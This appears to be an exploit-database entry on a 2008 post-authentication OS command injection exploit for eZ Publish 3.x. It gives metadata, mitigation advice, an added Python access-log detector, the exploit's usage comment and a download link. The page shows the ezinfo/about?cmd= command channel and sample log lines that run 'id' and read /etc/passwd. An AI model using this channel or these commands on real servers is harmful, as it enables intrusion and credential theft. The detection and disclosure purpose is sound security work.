Vendor: eZ Publish
Exploit by: s4avrd0w
CVSS: 9.3 (HIGH)
Vulnerability class: OS Command Injection
CWE: 78
Product Name: eZ Publish
Affected Version From: 3.9.2000
Affected Version To: 3.10.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:ezpublish:ez_publish
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

eZ Publish OS Commanding executing exploit

eZ Publish OS Commanding executing exploit is a post-authentication exploit, released as a zero-day in December 2008, that lets an attacker execute arbitrary OS commands on vulnerable eZ Publish 3.x installations (the author reports testing 3.9.0, 3.9.5 and 3.10.1). It is an abuse of legitimate functionality rather than an authentication bypass: the attacker must already hold the login credentials of an existing eZ Publish administrator. With those credentials the exploit logs in to the target admin interface and sends its payload; afterwards, OS commands are executed by requesting the site's ezinfo/about page with a cmd query parameter, i.e. http://<host>/ezinfo/about?cmd=<OScommand>. Because that command channel is an ordinary GET request, every command run this way leaves a "GET /ezinfo/about?cmd=..." entry in the web server access log, which is the simplest indicator to hunt for.

Mitigation:

Upgrade to a version of eZ Publish later than the affected 3.x releases (a patch exists for this issue), use strong, unique administrator credentials, and restrict network access to the admin interface so that guessed or stolen credentials cannot be used from arbitrary hosts. If the exploit may already have been run against a site, treat the host as compromised: review the access logs for requests to ezinfo/about carrying a cmd parameter, and restore the installation from a known-good copy rather than only applying the upgrade, since upgrading alone does not undo what an attacker did with the command channel.
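A detection check for the command channel described above, written as an added example for this page (it is not part of the Exploit-DB record or of s4avrd0w's code). It parses Apache "combined" access-log lines and flags any request to the ezinfo/about module that carries a cmd query parameter, returning the decoded command. The log lines are constructed for the example; the only fact taken from the exploit is the /ezinfo/about?cmd= URL pattern.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache "combined" log lines (not real traffic).
# Lines 3 and 5 are the post-exploitation command channel; the others are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2008:10:15:02 +0000] "GET /ezwebin_site_admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Dec/2008:10:15:09 +0000] "POST /ezwebin_site_admin/user/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Dec/2008:10:16:40 +0000] "GET /ezinfo/about?cmd=id HTTP/1.1" 200 312 "-" "curl/7.19"
10.0.0.9 - - [11/Dec/2008:10:17:01 +0000] "GET /ezinfo/about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Dec/2008:10:18:22 +0000] "GET /index.php/ezinfo/about?cmd=cat%20%2Fetc%2Fpasswd HTTP/1.1" 200 1833 "-" "curl/7.19"
"""

# Minimal "combined" log format parser: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_ezinfo_cmd(target):
    """Return (flagged, command) for a request target.

    Flags the request when the path ends in ezinfo/about (with or without an
    index.php prefix, and with any percent-encoding) and the query string
    carries a cmd parameter, which is the channel the exploit leaves behind.
    """
    parts = urlsplit(target)
    path = unquote(parts.path)
    if not re.search(r'(^|/)ezinfo/about/?$', path):
        return False, None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if 'cmd' not in qs:
        return False, None
    return True, qs['cmd'][0]  # parse_qs already percent-decodes the value


def find_command_hits(log_text):
    """Scan a whole log and return one record per command-channel request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        flagged, cmd = is_ezinfo_cmd(rec['target'])
        if flagged:
            hits.append({'ip': rec['ip'], 'ts': rec['ts'],
                         'status': rec['status'], 'cmd': cmd})
    return hits


if __name__ == '__main__':
    for hit in find_command_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} cmd={hit['cmd']!r}")
```

Run it against a real log by replacing SAMPLE_LOG with the file contents. A plain request to ezinfo/about without cmd is normal site traffic and is deliberately not flagged; an admin login from the same client shortly before the first cmd request is the sequence the exploit produces and is worth correlating by hand.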
Source

Exploit-DB raw data:

/*
    eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru]
    Versions affected 3.x
 
    * tested on version 3.9.0, 3.9.5, 3.10.1
 
    usage:  
 
    # ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server
 
    The options are required:
 
    -u Login of an existing admin on eZ Publish
    -p Admin password on eZ Publish
    -s Target eZ Publish admin interface
 
    example:
 
    # ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
    [+] Exploit successfully sending
    [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
*/

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip)

# milw0rm.com [2008-12-11]